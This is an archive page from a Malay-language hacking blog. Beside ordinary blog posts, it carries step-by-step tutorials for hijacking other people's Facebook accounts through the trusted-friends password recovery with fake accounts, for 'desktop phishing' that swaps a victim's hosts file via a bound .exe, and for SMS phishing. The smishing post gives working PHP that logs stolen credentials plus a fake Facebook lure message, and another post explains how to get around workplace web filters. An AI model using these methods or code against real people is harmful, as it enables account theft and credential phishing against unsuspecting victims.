Utama Blog Laman 332

Hack Facebook Dengan Kaedah Recovery

0

Salam semua..akhirnya tibalah masanya untuk Mr.Hac keluarkan artikel ini kerana sudah beberapa artikel sebelum ini banyak yang Hac ‘tahankan’ atas permintaan rakan..

Artikel ini kalau nak diikutkan sudah berada dalam draft dari minggu lepas..namun atas permintaan kawan baik Hac iaitu Azrael, Hac tahankan artikel ini terlebih dahulu kerana katanya ia boleh membawa musibah apabila dengan MUDAH dibuat dan disalahgunakan..ini kerana buat masa ini, kaedah yang bakal Hac tuliskan ini adalah kaedah hack Facebook yang paling berkesan dan paling mudah untuk dilakukan!

Namun apabila Hac telah melihat artikel ini terlebih dahulu dipost oleh seorang lagi rakan di Forum Silent Hackers, Hac rasakan ia perlu juga dipostkan di blog ini supaya lebih ramai dari kalangan anda yang MENGAMBIL PERHATIAN bahawa terdapat satu critical vulnerability dalam Facebook yang boleh menyebabkan banyak akaun digodam biarpun oleh orang kebiasaan..satu pesanan dari Hac, JANGAN DEDAHKAN DIRI ANDA KEPADA ORANG YANG TIDAK DIKENALI..

Adalah tidak menghairankan lagi apabila seseorang itu menerima pelawaan untuk menjadi rakan oleh orang yang tidak dikenalinya di Facebook (macam zaman Myspace dulu la..)..kerapkali kesemua permintaan untuk menjadi rakan di Facebook itu diterima untuk mengembangkan persahabatan dan tak kurang juga ada yang hendak menambahkan bilangan rakan..kelihatannya pada kebiasaan, Facebook selebriti dan mereka yang melakukan urusniaga kerap menerima 100% permintaan untuk menjadi rakan itu berbanding orang kebiasaan (biasa la..selebriti kena jaga hati peminat kan)..

Akaun dari jenis ini adalah yang PALING SENANG TERDEDAH KEPADA PENGGODAM..anda tidak perlukan sebarang kebijaksanaan ataupun ilmu hacking yang tinggi untuk melakukannya kerana anda hanya perlu melalui proses password recovery Facebook bersama 2 lagi rakan Facebook oleh akaun sasaran.

Anda dengan mudah boleh mendapatkan akses ke akaun tersebut dengan pendekatan yang sederhana..anda cuma perlu menggunakan ciri-ciri Facebook Password Recovery yang boleh dicapai melalui pautan “Forgot your password?” pada laman log masuk ke Facebook..

Setelah anda dapat mengenalpasti rakan-rakan, Facebook akan mencadangkan untuk mendapatkan semula kata laluan melalui alamat e-mel yang sedia ada..bagaimanapun ciri ini boleh dilepasi melalui pautan “No longer have access to these?”..dalam kes ini, Facebook akan meminta alamat e-mel yang baru..langkah seterusnya Facebook akan menanyakan soalan yang berkaitan dengan akaun tersebut..ciri ini juga boleh dilepasi dengan cara menaip jawapan yang salah sebanyak 3 kali..selepas itu, Facebook akan memberikan anda cara yang lebih memeranjatkan untuk mendapatkan semula kata laluan, iaitu dengan sokongan 3 orang rakan..

Hack Facebook Dengan Kaedah Recovery:

1. Pertama sekali, anda perlu memilih 3 orang rakan ‘yang dipercayai’..3 orang rakan ini akan menerima 3 code yang diperlukan untuk mengubah kata laluan akaun tersebut.

2. Pilih diri anda sendiri dan kemudian anda akan menerima code dari Facebook. dengan 3 code itu, anda dengan mudah akan dapat mengubah kata laluan akaun mangsa.

3. Masalah utamanya ialah 2 orang rakan lagi yang anda tidak begitu kenal dan tidak dapat dipercayai sepenuhnya boleh mendapatkan akses ke akaun itu melalui kaedah password recovery itu tadi..jadi?

4. Masalah ini juga boleh dilepasi melalui Teknik Social Engineering..buat lagi 2 akaun Facebook yang palsu dan tambahkan akaun mangsa ke dalam senarai rakan..sekarang, dapatkan ketiga-tiga code dari Facebook dan kesemuanya sudah selesai!!

Sedikit Pesanan: Akaun sasaran anda akan dikunci selama 24 jam selepas kata laluan diubah dan e-mel pengguna yang asal akan menerima pemberitahuan akan penukaran kata laluan bersama dengan senarai 3 orang rakan yang menerima code dari Facebook. bagaimanapun sekiranya 3 rakan ini adalah palsu, adalah tidak penting lagi sekiranya anda mengetahui nama mereka..

Iklan Newspaper Inline

Cara Menggunakan Ultrasurf 10.10

0

Tutorial Cara Menggunakan Ultrasurf ini Mr.Hac buat khas untuk mereka yang masih tak tahu bagaimanaj cara terbaik untuk menggunakannya..setakat ini (20/05/11), versi terbaru ialah Ultrasurf 10.10 @ U1010..jadi tutorial ini Hac tulis menggunakan Ultrasurf versi ini..kaedah atau cara menggunakan Ultrasurf perlu dipelajari oleh semua orang yang mahukan keselamatan daripada ancaman para penggodam ketika melayari internet..setelah beberapa siri dalam blog ini yang membincangkan mengenai Ultrasurf, akhirnya Hac buatkan satu tutorial khas untuk anda semua..(serius khas untuk mereka yang di tempat kerjanya, atau di tempat belajarnya sudah block laman-laman web tertentu..hahaha..serius tu!)

Tutorial ini ringkas sahaja..tak perlu pengetahuan IT yang tinggi..Hac karangkan dengan cara yang simple supaya mudah difahami oleh semua orang..oleh itu mari kita sama-sama lihat bagaimana cara untuk kita bypass websense dan kita akan dapat melayari internet dengan bebas!

Nampak tak tu? klik 2 kali (double click) pada icon Ultrasurf tu..Hac ada buat koleksi tau dari versi 10.05 sampai la versi terkini..

Waktu ni kena sabar..Ultrasurf belum disambungkan dengan server..

Ok..berhasil! waktu ni Ultrasurf dah berjaya disambungkan ke server dan segala sekatan websense sudah boleh kita bypass..

Klik pada Option (dalam kotak tu)

Ikut semua setting seperti diatas (setting ini untuk mereka yang menggunakan Firefox)
Kemudian klik pada Proxy Settings..

Boleh pilih ‘Directly use Ultrasurf’…atau…

Boleh letak setting seperti diatas..boleh juga letak nombor 9666 (gantikan) pada tempat Hac letakkan nombor 8580 tu..ada juga yang bertanya, betul ke setting tu Mr.Hac? macam salah je..ya…jawapannya, memang salah pun..tapi kalau hendak diikutkan, setakat yang Hac guna sehingga hari ini, tiada masalah yang berbangkit berkenaan isu setting ini (dari forum sehingga ke laman blog, semuanya mengatakan benda yang sama)..kalau ada masalah, pasti tiada orang yang akan menggunakan setting seperti ini..

Kalau nak diikutkan juga, pada kotak Proxy Host dan Proxy Port, sepatutnya kita meletakkan nilai proxy dan port-nya..tetapi sukar untuk mencari proxy yang benar-benar ‘fresh’ dan masih berfungsi walaupun kita menggunakan perisian Proxy Finder ataupun kita mencarinya secara manual di Alive Proxy..jadi? jadi gunakan sahaja setting seperti diatas..

Apa kegunaannya setting itu? gunakan sekiranya Ultrasurf sudah tidak berfungsi lagi seperti biasa..mungkin port 9666 sudah disekat oleh jabatan tempat anda bekerja..oleh itu gunakanlah segala setting yang ada dengan sebaik-baiknya..

Untuk pengguna Firefox, anda perlu menggunakan Add-On WJBUTTON dari Ultrasurf supaya Ultrasurf dapat digunakan secara menyeluruh, berkesan, dan mudah..dengan ‘button’ ini, anda boleh ‘On’ dan ‘Off’ connection anda ke internet sama ada menggunakan Proxy Ultrasurf atau sambungan secara terus..

Muat turun dan install di sini —> WJBUTTON

Ekstrak fail yang telah anda muat turun dan buka ia menggunakan Firefox..install seperti biasa..setelah install, anda akan nampak button ini berada dibawah sekali..(sila enable terlebih dahulu add-on toolbar)

Ikut setting seperti dalam gambar diatas..

Anda akan dapat lihat button Ultrasurf berada pada bahagian bawah Firefox (pada add-on toolbar)

Nak download Ultrasurf? klik button download dibawah:

Ultrasurf versi lama:

Ultrasurf 10.05

Ultrasurf 10.06

Ultrasurf 10.07 (direkomenkan sebab laju..tak tahu kenapa..)

Ultrasurf 10.08

Ultrasurf 10.09

(yang lain-lain pun laju juga..cuma Hac suka versi 10.07 dan 10.10 yang terbaru tu)

Kepada mereka yang menggunakan web browser IE, anda tidak perlukan apa-apa setting kerana semuanya automatik..tetapi kepada mereka yang menggunakan firefox, anda perlu ikut setting diatas..habis Mr.Hac, kalau mereka yang gunakan chrome dan lain-lain browser macam mana?

kepada mereka yang menggunakan chrome dan lain-lain browser, anda perlu tukarkan setting proxy (Proxy Settings) iaitu:

Klik Option > Proxy Setting > LAN Setting > Klik pada ‘Use a proxy server for your LAN’

HTTP Proxy : 127.0.0.1
Port : 9666

Chrome juga mempunyai extension proxy yang berfungsi sama seperti WJBUTTON..sila ke sini untuk mendapatkannya —> Chrome Extension

P/S: Hac biasa gunakan Proxy Switchy!

Ada sesetengah orang yang merungut dengan mengatakan Ultrasurf tidak lagi dapat bypass sekatan yang dilakukan oleh office mereka..tetapi permasalahan ini sebenarnya berpunca dari penggunaan versi lama..Hac sudah mencuba kesemua versi-versi lama (versi bawah dari 10.05) dan sememangnya connection kepada server terlalu lambat..jadi untuk mereka yang betul-betul perlukan perisian yang dapat membantu mereka untuk melepasi sekatan di pejabat, gunakan versi terbaru!
namun, kalau nak cuba juga apa salahnya kan? dengan mencuba versi lama, sekurang-kurangnya anda akan dapat tahu beza antara yang lama dengan yang baru..

Klik disini —> Old Version of Ultrasurf Collection

Ok lah..cukup sampai disini sahaja tutorial dari Mr.Hac..nanti sekiranya ada apa-apa pertanyaan, sila komen dibawah ok..kalau rasa tutorial ini masih tidak lengkap dan mahu supaya Hac menambah apa-apa, sila bagi tahu ya..

Berikut Mr.Hac lampirkan sekali e-book percuma mengenai Ultrasurf untuk dimuat turun oleh anda semua —> Ultrasurf-User’s Guide

Iklan Newspaper Inline

BLOGLIST FAIZAL FREDLEY DOT COM

0

Salam..tengok banner kat bawah rasanya ramai betul yang kenal dengan beliau ni kan..
jadi Hac tetap tak mahu lepaskan peluang untuk beramah mesra dengan beliau..heheheh..
satu hari nanti, bila followers blog ni (The Aryan Nation) dah cecah 1682 (sama jumlahnya dengan followers blog beliau) baru la Hac akan ada keberanian untuk buat Segmen-segmen macam ni..eerrr..aduh..bila penulis IT menulis benda lain, memang akan melalut..

Dalam syaratnya, bro Faizal minta supaya sesiapa yang ingin turut serta supaya menyebut SAYA NAK JOIN BLOGLIST NI..tu je katanya..aish..asihwarya rai..betul ke ni?
so dah siap la entry Mr.Hac malam ni?ok..

Iklan Newspaper Inline

Segmen Khas ar-rifke | Jom Review Blog Bersama Aried!

0

Salam..err..entry ni dah diperbetulkan..harap maklum..

Jom review blog bersama aried dengan hanya copy paste sahaja ayat ini! Sama-sama kita lihat siapa yang bertuah dan mereka yang dipilih akan direview habis-habisan! Cepat sebelum terlambat! Copy ayat pendek ini dan paste segera di blog anda! Pastikan anda tidak termasuk dalam 20 top blogger melayu ini agar peluang berharga ini dapat dirasai oleh blogger-blogger lain juga.

Jom ke pautan ini —> Segmen Khas ar-rifke | Jom Review Blog Bersama Aried!

Iklan Newspaper Inline

Eset Smart Security 5 Beta Dengan Fungsi Baru!

0

Setelah artikel Eset Smart Security 4.2.71.2 Including Username and Password Finder mendapat sambutan yang baik, kini telah tiba masanya untuk kita beralih kepada satu evolusi dalam antivirus, antispyware, antipam yang terbaru dari Eset dan ianya adalah Eset Smart Security 5 Beta!

Setelah berbagai feedback memberansangkan diberi oleh para pengguna Eset, seperti yang dijangka Eset telah menambah pelbagai ciri keselamatan tambahan yang tidak dapat tidak bakal menobatkan Eset sebagai antivirus and network protection
yang terbaik untuk tahun akan datang..antara ciri-ciri terbaru itu termasuklah:

Parental Control
Parental control lets you block sites that may contain potentially offensive material. In addition, parents can prohibit access to up to 20 pre-defined website categories.

Cloud Powered Scanning
Based on real-time streaming of threat-related information from the cloud, the ESET Virus lab keeps the reputation services up-to-date for a constant level of protection against Internet threats.

Improved Antispam
Our antispam module integrated in ESET Smart Security has undergone a thorough optimization process for even higher level of detection precision.

Enhanced Media Control
Block threats trying to get through to the system via removable media. ESET Smart Security 5 automatically prompts you to scan the content of all USB flash drives, CDs and DVDs. Block specific media based on a range of parameters like the device ID, media type, and serial number.

Intelligent Firewall
ESET Smart Security 5 helps you prevent unauthorized users from accessing your computer remotely and monitoring your network traffic.

(copy bulat-bulat dari Eset..malas nak terjemah)

Lagi ciri tambahan:

Gamer Mode
When in full-screen mode, ESET Smart Security 5 automatically switches to silent mode, which saves system resources, so you can enjoy playing computer games or concentrate on important work tasks without distractions from pop-up messages.

Advanced HIPS Functionality

This one is for real Geeks – now you can customize the behavior of the system in greater detail: specify rules for the system registry, active processes and programs, and fine-tune your security posture.

Advanced Setup Tree

Redesigned advanced setup tree for more intuitive and easier navigation.

Kalau ciri-ciri tambahan ini sudah begitu menakjubkan, apa salahnya kita mencuba terlebih dahulu versi beta ini?
Sila klik pautan disebelah untuk
memuat turun Eset Smart Security 5 Beta —> Eset Smart Security 5 Beta Download

Tonton video dibawah untuk melihat sendiri kehebatan Eset Smart Security 5 Beta!

Iklan Newspaper Inline

Segmen Bloglist Abgteror | Tanah Tumpah Darahku!

0

Salam semua! haha..lepas Hac menyertai segmen dalam blog ar-rifke hari tu, hari ni Hac nak join lagi segmen dalam blog abgteror pula! jadi entry malam ni sangat santai! enjoy nohhh..

Untuk segmen ni, abgteror minta untuk sesiapa yang ingin menyertainya supaya menjawab soalan yang disediakan..dan Alhamdulillah, Hac tak perlu tag sesiapa..kalau nak kena tag, Hac jadi susah hati sikit sebab tak semua orang suka di-tag (abgteror pun cakap macam tu!)

Lagipun Hac fikir segmen ni senang sikit..sama macam segmen ar-rifke hari tu..tak sampai 5 minit dah siap satu entry..jadi, jom sama-sama kita terjah soalan dan jawapan dari Hac yang mungkin akan mengejutkan anda! ahahaha!

UPDATE: INI ialah KALI KETIGA ABGTEROR membuatkan header untuk blog My Hackers Are Here ini secara PERCUMA..ya..diulangi PERCUMA ya..kali pertama dan kali kedua Hac yang minta..kali ketiga ini Abgteror sendiri yang volunteer untuk membuatkannya kerana yang lama sudah tidak ‘kena’ dengan design template terkini..jadi kepada Abgteror, terima kasih daun keladi Hac ucapkan, kalau sudi design la lagi! hehehe!

Soalan dari Abgteror dan jawapan dari Arya Putra a.k.a Mr.Hac a.k.a Mr.Rious:

1. Dimana anda dilahirkan?
Ipoh darul ensem..heheheh..bangga betul jadi anak kelahiran negeri Ipoh..

2. Dimana anda dibesarkan?
Rumah..heheheh!! gurau je abgteror! dilahirkan di Ipoh, membesar di Ipoh juga..jadi anak Jati Ipoh ni sememangnya sangat rindukan tanah tumpah darahnya kerana di Ipoh begitu senang untuk menjumpai apa-apa yang kita minati..contohnya kalau minat dengan handphone, cari aje di Greentown Mall..berderet wok kedai handphone!

3. Negeri pilihan anda untuk dimasukkan ke dalam senarai bloglist abgteror?
WILAYAH PERSEKUTUAN PUTRAJAYA..

4. Ceritakan sedikit mengapa anda memilih negeri tersebut?
Cerita sedikit? cerita banyak pun boleh kalau abteror yang minta! Mr.Hac pilih Putrajaya kerana Mr.Hac sukakan pemandangan di Putrajaya..walaupun Putrajaya tidak banyak tempat untuk kita lawati, tetapi kita boleh (kerap) dapat melihat para pelakon berada disini kerana Putrajaya sering menjadi tempat (venue) pilihan para pengarah filem (Evolusi KL Drift 2 pun buat di Putrajaya juga)..
Selain itu, terdapat banyak event yang gempak dan menarik berlangsung di Putrajaya..Pesta Belon Panas, Funfair, Perhimpunan 1 Juta Belia (27-29 Mei) dan lain-lain lagi..ada juga Masjid Terapung yang menjadi kebanggaan Putrajaya..jadi pendek kata, cubalah datang kesini untuk melihat sendiri pelbagai jenis tempat yang seronok untuk dikunjungi..

Yes! siap! Ok..sekian dahulu buat masa ini abgteror..
nanti jangan lupa pilih Hac ya..heheh..terima kasih..salam..

P/S: Jangan lupa untuk turut serta dalam segmen ini ok..
sila layari pada pautan ini—> Segmen Bloglist Abgteror | Tanah Tumpah Darahku

Iklan Newspaper Inline

Kaedah Hacking Melalui Desktop Phishing

0

Salam..tutorial ini Mr.Hac dedikasikan kepada mereka yang sudah mencuba SMS Phishing..pening kepala?
Ok..tak mengapa sebab dalam tutorial Desktop phishing ini Hac akan beritahu serba sedikit beberapa benda yang ada kena mengena dengan SMS Phishing..ok?

Seni Phishing ini adalah jauh lebih advance berbanding sebelumnya..jadi Hac mengesyorkan anda baca dahulu siri seni phishing dalam blog ini supaya anda tidak ketinggalan point-point yang penting dalam usaha memahami kaedah phishing..

Dalam kaedah Desktop Phishing, seorang penggodam mengubah fail host anda (Windows/System32/drivers/etc/hosts) yang mana fail ini mengawal sesi pelayaran internet anda..

Perbezaan Antara Phishing dan Desktop Phishing:

Phishing:

1. Seseorang penggodam meyakinkan mangsanya untuk mengklik pada pautan yang membawa kepada halaman log masuk palsu (fake login page) yang menyerupai halaman log masuk yang sebenar.

2. Mangsa memasukkan maklumat akaunnya kepada halaman itu dan kesemua maklumat ‘diberikan’ terus kepada penggodam.

3. Mangsa kemudiannya akan dihalakan kepada halaman lain atau halaman log masuk yang asal bergantung kepada skrip yang telah dibuat oleh si penggodam.

Cuma masalah utama dalam seni phishing ini ialah mangsa dengan mudah dapat membezakan pautan halaman palsu dan halaman log masuk yang asli dengan melihat kepada pautan tersebut..

Desktop Phishing:

1. Penggodam menghantar satu fail (.exe) untuk diklik oleh mangsa. Apabila mangsa klik sahaja pada fail tersebut, semuanya selesai!

2. Mangsa menaip pautan kepada halaman log masuk yang asal tetapi dihalakan kepada halaman log masuk palsu tanpa pengetahuannya kerana nama domain pautan tersebut kekal seperti yang asal.

3. Langkah seterusnya sama sahaja seperti seni phishing yang biasa.

Apa Itu Host File?

Host file ialah satu fail teks yang mengandungi nama domain dan alamat IP yang berhubungkait dengannya..Lokasi fail ini terletak di:

notepad %windir%system32driversetchosts (taipkan di Run… dan tekan Enter)

atau anda boleh melihatnya secara normal di windows: C:WindowsSystem32driversetc

Apabila anda menaip sebagai contoh www.anywebsite.com, satu ‘pertanyaan’ akan dihantar kepada Domain Name Server (DNS) untuk mencari alamat IP yang berhubung dengan nama domain atau laman web itu. tetapi sebelum ini dilakukan, fail host yang berada dalam komputer kita akan ‘diperiksa’ untuk mendapatkan alamat IP kepada domain tersebut.

Katakan anda sudah membuat satu entry dalam fail host..contohnya apabila anda menaip www.anywebsite.com, anda akan dibawa kepada alamat IP 115.125.124.50. tiada ‘permintaan’ untuk mendapatkan lagi IP yang berhubung dengan www.anywebsite.com yang akan dihantar kepada DNS..lihat contoh pada gambar dibawah.

Bagaimana Kaedah Penyerangannya?

Sudah jelas rasanya bagaimana keadaan pelayaran internet anda sekiranya fail host ini diubahsuai oleh penggodam..

Apa yang perlu kita lakukan ialah mengubahsuai fail host dengan menambahkan nama domain yang asli/asal serta menghubungkannya kepada alamat IP halaman log masuk palsu yang telah kita buat..apabila mangsa menaip alamat domain yang asli, dia akan dihalakan kepada halaman log masuk yang palsu..sila lihat gambar dibawah.

Kaedah Hacking Melalui Desktop Phishing:

Kini sampailah masa kepada tutorial Desktop Phishing. Ikuti langkah demi langkah yang akan diberikan kepada anda kerana ia ada kaitan dengan SMS Phishing yang Hac telah ajarkan sebelum ini.

1. Host/Kendalikan Laman Phishing Dalam Komputer Anda
Disebabkan laman webhosting yang kerap digunakan oleh penggodam seperti 110mb.com, ripway.com, dan lain-lain lagi tidak menyokong ciri-ciri seperti menghalakan alamat IP kepada laman web anda seperti www.akunakhackkau.110mb.com (alamat IP dihalakan kepada webserver dan bukannya laman web), jadi kita perlu mengendalikan laman phishing yang telah dibuat dalam komputer sendiri dengan menggunakan perisian web server seperti wamp atau xampp..(ada kaitan kan dengan SMS Phishing?)

Seterusnya muat turun salah satu daripada perisian tersebut. katakan anda memilih wamp:

—> Salin fail phishing anda dan letakkannya dalam direktori WWW pada wamp, kedudukannya ialah di “C:WampWWW

—> Jalankan Server Wamp pada PC anda.

—> Klik kanan di ikon wamp pada system tray dan pilih Start all services, pergi kepada public IP address anda dan anda akan dapat lihat laman phishing anda. (lawati cmyip.com untuk melihat alamat IP anda, dan salin IP itu..paste pada bar carian pelayar anda dan anda akan dapat lihat laman phishing anda itu..ok?)

2. Ubahsuai Fail Host
Sekiranya anda tidak mempunya sebarang akses kepada komputer mangsa, jadi salin fail host anda sendiri dan letakkannya pada desktop (senang nak tengok)
buka ia dengan notepad dan letakkan alamat IP anda dihubungkan bersama dengan nama domain yang anda ingini..

Sebagai contoh, apabila mangsa melawati www.gmail.com, dia akan dibawa kepada laman web yang dihoskan pada alamat IP ‘xxx.xxx.xxx.xxx’.

Gantikannya dengan alamat IP anda (Public IP Address)

3. Compress fail host anda itu tadi dan apabila mangsa membukanya, ia secara automatik akan disalinkan kepada C:Windowssystem32driversetc
—> fail host mangsa akan digantikan dengan fail host yang telah diubahsuai tadi.
Sila ikuti kaedahnya melalui gambar-gambar berikut:

Klik OK..Sekarang anda sudah boleh bind fail ini dengan mana-mana fail exe (.exe) dengan menggunakan binder atau hantarkannya secara terus kepada mangsa. apabila mangsa klik pada fail ini, kerja anda sudah ditanggung beres!

Limitasi Kaedah Phishing Ini:

1. Apabila anda menggunakan public IP, maka ia akan cepat berubah setiap kali anda connect dan disconnect..jadi anda perlu mendapatkan static IP sama ada dengan membelinya atau mendapatkannya di mana-mana sumber..satu perkataan yang sesuai untuk anda —> GOOGLE

2. Pelayar yang digunakan oleh mangsa mungkin akan memberikan amaran bahawa Digital Certificate laman web yang sedang dilawatinya adalah tidak asli.

Iklan Newspaper Inline

Kaedah Hacking Melalui SMS Phishing (Smishing)

0

Seni phishing nampaknya telah banyak berevolusi..dalam blog ini pun Hac telah menulis beberapa kaedah untuk melakukannya dan kebanyakan kaedah menjurus kepada cara untuk menggodam Facebook..

Dalam tutorial kali ini Hac akan memberikan satu cara untuk membuat SMS PHISHING atau Smishing..kaedah ini adalah kombinasi antara SMS dan phishing..
ia bukanlah benda baru tetapi kaedah ini boleh dikatakan masih relevan untuk digunakan kepada mereka yang kurang pengetahuan dalam ilmu IT..jadi mari sama-sama kita terjah tutorial ini!
(Entry ini seperti biasa akan membincangkan kaedah untuk hack Facebook)

p/s: kalau ada kesilapan dalam tutorial ini harap maaf lah yaaa…

‘Perjalanan’ Gerak Kerja Teknik Hacking Ini:

Seperti biasa, phishing jenis ini masih menggunakan ‘fake login page’ atau halaman log masuk palsu..cuma versi ini menggunakan telefon bimbit sebagai medium penyampaian maklumat..si mangsa akan menerima satu sms mengatakan ada versi baru dalam Facebook Mobile dan harus dicuba supaya tidak ketinggalan..

Apa yang diperlukan ialah web server yang dijalankan pada komputer anda dan disambungkan ke internet, serta nombor telefon bimbit sasaran..jangan tanya Mr.Hac bagaimana nak dapatkan web server ataupun perisiannya..
sila —–> GOOGLE..

Kaedah Membuat SMS Phishing a.k.a Smishing:

Pergi ke pautan Facebook Mobile dan salin serta simpan source codenya (klik kanan+View Page Source) pada komputer anda..buka fail tersebut dengan menggunakan notepad dan ubah code ‘form method’ daripada ‘post’ kepada ‘get’..ubah nilai ‘action’ kepada write.php (nak letak nama lain pun boleh!)..namakan fail itu sebagai ‘index.htm’..buat satu lagi fail dengan membuka notepad, salin code berikut dan simpankan ia, namakan sebagai ‘write.php’..

<?php
header(“Location: http://m.facebook.com/login.php?m=m&r811c1f38&refid=9&rdd9db9a5&e=iep&r1129f1e6”);
$handle = fopen(“pswd.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>

atau boleh juga gunakan code ini:

header(“Location: http://m.facebook.com/login.php?m=m&r811c1f38&refid=9&rdd9db9a5&e=iep&r1129f1e6”);$handle = fopen(“pswd.txt”, “a”);
foreach($_GET as $variable => $value) {fwrite($handle, $variable);fwrite($handle, “=”);fwrite($handle, $value);fwrite($handle, “rn”);
}fwrite($handle, “rn”);fclose($handle);
exit;?>

Buat juga satu lagi fail dari notepad dan namakannya sebagai pswd.txt..terus simpan tanpa mengubah apa-apa..

Penghantaran SMS:

Sila gunakan laman web penghantaran SMS percuma yang menghantar dengan menggunakan nombor mereka sendiri dan tidak perlukan pendaftaran (ni panduan supaya senang kerja!)..terdapat banyak laman seperti itu..seperti biasa, jangan tanya..sila GOOGLE..berikut adalah sedikit pratonton SMS yang akan dihantar:

Experience the brand new version of facebook! Faster and secure. Follow the link now:
http://alamat-IP-anda/direktori-anda/
-Facebook development team.

Disarankan supaya anda gunakan proxy sebelum menghantar SMS tersebut..
Sedikit pesanan: berhati-hati apabila menjalankan server..

Ya..tutorial ini memang tidak lengkap..Mr.Hac ada tinggalkan satu lagi gerak kerja yang perlu anda cari sendiri iaitu cara untuk memuat naik fail-fail diatas ke dalam web server..sengaja Hac buat begitu supaya anda tahu nilai ilmu yang Hac sampaikan di sini..sekiranya ada kekeliruan, ada permasalahan (troubleshooting), atau ada kepala-kepala yang sakit akibat memikirkan caranya, maka carilah perlahan-lahan dan anda pasti akan jumpa jawapannya!

Iklan Newspaper Inline

Sikap Yang Patut Ada Pada Seorang Hacker

0

Salam..

Ok..sebelum ni saya pernah buat entry pasal Etika Seorang Hacker. Artikel tu dah cukup lengkap. Cuma saya nak tambah nasik sikit! Sebab sejak kebelakangan ni ramai sangat yang datang ke blog ini dan tunjuk beberapa sikap yang saya tak gemar..boleh kata entri kali ni ada sikit ilmiah berbaur emosi+personal..so get ready..

Antara beberapa sikap yang Hac tak suka tu ialah:

1. Tiba-tiba bagi komen “Tak faham!” <— kadang-kadang tanda seru nak dibubuhnya sampai sepuluh!

2. Belum buat setiap langkah dah tanya macam-macam.. (?)

3. MALAS GOOGLE..

3 sikap ni memang cukup Hac benci dan tak suka..terus terang cakap..kalau anda semua belum baca entry Etika Seorang Hacker, sila BACA SEKARANG!!


Hac nak ingatkan, kepada semua yang datang sini NAK BELAJAR, tolong la..kalau tak faham, TANYA..kalau Hac tak berikan jawapan yang memuaskan, SILA GOOGLE..JANGAN MALAS GOOGLE..JANGAN!!


Tolong ikuti dan buat setiap langkah yang telah Hac tulis PENAT-PENAT tu dengan SABAR barulah bertanya apa-apa..ni tidak..belum buat apa-apa dah kata tak faham, dah tanya itu ini begitu begini..


Sikap macam ni yang anda semua tunjuk dengan Hac?? sikap macam ni yang anda semua nak tunjukkan bahawasanya ‘SAYA NAK JADI SEORANG HACKER’??
sikap macam ni tidak akan membawa anda ke mana-mana bahkan merugikan masa anda datang ke sini membaca hanya untuk membetah Mr.Hac!
Hacker kena rajin MENELAAH atau bahasa mudahnya kena rajin buat kajian sendiri..
Mr.Hac pun TAK PERNAH MASUK KELAS IT, TAK PERNAH AMBIL KURSUS HACKING..


Tapi atas kesungguhan Hac sendiri, Hac berjaya buat blog ni dan menulis di dalamnya akan ‘isi’ untuk tatapan anda semua..dan sekiranya Hac lihat perkara seperti ini masih berlaku lagi pada masa akan datang, jangan berasa terkilan jika Hac padam komen anda atau sekat IP anda daripada memberikan sebarang komen..


RAJIN-RAJINLAH buat kajian..kalau betul-betul berminat hendak mempelajari teknik, tip, trik komputer serta ilmu hacking, anda kena RAJIN! apa guna ada GOOGLE.COM kalau anda malas nak taip soalan di situ??


Apa yang penting selepas ini jangan tunjukkan sikap-sikap itu tadi..MANJA sangat!
anda tidak akan maju selagi hendak MAKAN BERSUAP dan tunggu semuanya dihidang di depan mata! biar hacker itu tahu dan kenal erti susah payah baru layak bergelar hacker biarpun taraf rendahan seperti script kiddies kerana script kiddies juga pada zahirnya orang biasa tapi RAJIN meneliti coding-coding walau adakalanya tidak faham apa pun!

Re-edit : Sebabnya aku sendiri baca pun geli. Biasa la, artikel lama, tak matang lagi dalam penulisan. Haha!

Iklan Newspaper Inline

Apa Itu Social Engineering?

0

Apa Itu Social Engineering?

Social Engineering (SE) bukanlah satu jenis perisian..ia adalah cara ataupun kaedah seseorang hacker (penggodam) memanipulasi kepercayaan orang lain untuk melakukan perkara yang tidak sepatutnya dilakukan olehnya atau membuat seseorang percaya untuk memberikan maklumat sulit yang diperlukan oleh hacker tersebut..secara ringkasnya SE ialah teknik permainan psikologi yang sering digunakan oleh hacker untuk mendapatkan informasi penting dari orang lain..
Kevin Mitnick ialah orang yang bertanggungjawab mempopularkan istilah SE ini..

Kesan Social Engineering:

Jika anda fikir SE sering dilakukan untuk memperdayakan orang biasa, anda salah..kerana orang seperti Kevin Mitnick berjaya memperdayakan FBI, NOKIA, MOTOROLA, dan banyak lagi mangsa/sasarannya yang lebih ‘besar’..namun bagi Mr.Hac, teknik ini juga boleh dimanupulasi oleh orang biasa dengan sedikit kemahiran penyamaran untuk memperdayakan mangsa yang kurang pengetahuan tentang IT..
tujuannya masih kekal sama, untuk mendapatkan data sulit/peribadi..

Kaedah Mengelakkan Diri Dari Menjadi Mangsa Social Engineering:

Adalah sukar sebenarnya untuk seseorang mengelakkan diri kerana telah menjadi fitrah manusia untuk mempercayai orang lain..namun terdapat sedikit tips sebagai panduan untuk mengelakkan diri kita dari menjadi mangsa:

1. Jangan sesekali berkongsi kata laluan dengan orang lain (biar siapa pun dia!)

2. Jangan buang bil kad kredit atau kad debit anda ke dalam tong sampah kerana ia mengandungi maklumat yang penting seperti nombor akaun, nombor kad dan lain-lain..jangan buang ok..terus MUSNAHKAN sahaja sekiranya tidak mahu digunakan lagi.

3. Perbaiki ilmu dan kelemahan diri anda tentang IT..

Ada banyak lagi tips tapi cukup la banyak ni..bagi banyak-banyak pun belum tentu dibaca!

P/S: Artikel ini hanya menjelaskan secara ASAS tentang Social Engineering..sekiranya anda mahukan lebih lagi info, silalah GOOGLE..terima kasih..

“Social engineering bypasses all technologies, including firewalls.” – Kevin Mitnick

“To what ever extent the companies may feel secure with latest security tools but still the human factor is the weakest vulnerability” – Kevin Mitnick

Iklan Newspaper Inline